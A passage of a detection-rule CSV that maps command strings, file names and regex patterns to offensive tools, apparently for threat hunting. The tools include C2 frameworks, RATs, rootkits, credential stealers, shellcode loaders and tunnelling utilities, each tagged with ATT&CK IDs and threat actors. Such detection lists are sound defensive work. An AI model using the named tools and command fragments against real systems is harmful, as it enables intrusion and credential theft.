tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51518" "*mac.changer on*",".{0,1000}mac\.changer\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","51519" "*mac_dirty_cow.*",".{0,1000}mac_dirty_cow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51520" "*mac2john.py*",".{0,1000}mac2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51521" "*mac2john-alt.py*",".{0,1000}mac2john\-alt\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51522" "*MaccaroniC2.git*",".{0,1000}MaccaroniC2\.git.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","51523" "*macchanger -r*",".{0,1000}macchanger\s\-r.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","51525" "*MaceTrap.exe*",".{0,1000}MaceTrap\.exe.{0,1000}","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","51527" "*machine1337/TelegramRAT*",".{0,1000}machine1337\/TelegramRAT.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","51528" "*Macro payload cannot be smuggled*",".{0,1000}Macro\spayload\scannot\sbe\ssmuggled.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","51530" "*macro_pack.exe -G *",".{0,1000}macro_pack\.exe\s\-G\s.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro 
formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","51531" "*MacroDetectSandbox.vbs*",".{0,1000}MacroDetectSandbox\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","51532" "*MacroExploit.txt*",".{0,1000}MacroExploit\.txt.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","51533" "*Macrome *--decoy-document*",".{0,1000}Macrome\s.{0,1000}\-\-decoy\-document.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51534" "*Macrome *--payload*",".{0,1000}Macrome\s.{0,1000}\-\-payload.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51535" "*Macrome build*",".{0,1000}Macrome\sbuild.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51536" "*Macrome.csproj*",".{0,1000}Macrome\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51537" "*Macrome.dll*",".{0,1000}Macrome\.dll.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51538" "*Macrome.sln*",".{0,1000}Macrome\.sln.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51539" "*MACshellcode.cpp*",".{0,1000}MACshellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51540" "*MACshellcode.exe*",".{0,1000}MACshellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51541" 
"*MACshellcode.sln*",".{0,1000}MACshellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51542" "*MACshellcode.vcxproj*",".{0,1000}MACshellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51543" "*Made by: @Trevohack | @opabravo | @matheuz*",".{0,1000}Made\sby\:\s\@Trevohack\s\|\s\@opabravo\s\|\s\@matheuz.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","51544" "*Made in France*by @Nicocha30!*",".{0,1000}Made\sin\sFrance.{0,1000}by\s\@Nicocha30!.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51545" "*MadExploits/Gecko*",".{0,1000}MadExploits\/Gecko.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","51546" "*maestro.exe exec*",".{0,1000}maestro\.exe\sexec.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","51547" "*MAGENT=merlinAgent*",".{0,1000}MAGENT\=merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51548" "*MAGIC_PREFIX ""diamorphine_secret*",".{0,1000}MAGIC_PREFIX\s\""diamorphine_secret.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","51549" "*magicRasMan*",".{0,1000}magicRasMan.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","51550" "*Magnitude Exploit Kit*",".{0,1000}Magnitude\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","51551" "*mail-in-the-middle.py*",".{0,1000}mail\-in\-the\-middle\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","51552" "*mailpv.exe*",".{0,1000}mailpv\.exe.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51553" "*mailpv.zip*",".{0,1000}mailpv\.zip.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51554" 
"*MailSniper*",".{0,1000}MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Discovery","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","51555" "*MailSniper.ps1*",".{0,1000}MailSniper\.ps1.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","51556" "*main/gcr.py*",".{0,1000}main\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","51557" "*main_air_service-probes.go*",".{0,1000}main_air_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt 
- Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","51558" "*main_pro_service-probes.go*",".{0,1000}main_pro_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider 
- XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","51559" "*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","51561" "*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","51562" "*make onionpipe*",".{0,1000}make\sonionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","51563" "*make proxychains quiet*",".{0,1000}make\sproxychains\squiet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","51564" "*make shared dir 
for kidlogger ini files*",".{0,1000}make\sshared\sdir\sfor\skidlogger\sini\sfiles.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51565" "*make tun2socks*",".{0,1000}make\stun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","51566" "*make_avet -l *.exe *",".{0,1000}make_avet\s\-l\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51567" "*make_avetsvc *",".{0,1000}make_avetsvc\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51568" "*make_kernel_shellcode*",".{0,1000}make_kernel_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51569" "*make_kernel_user_payload*",".{0,1000}make_kernel_user_payload.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
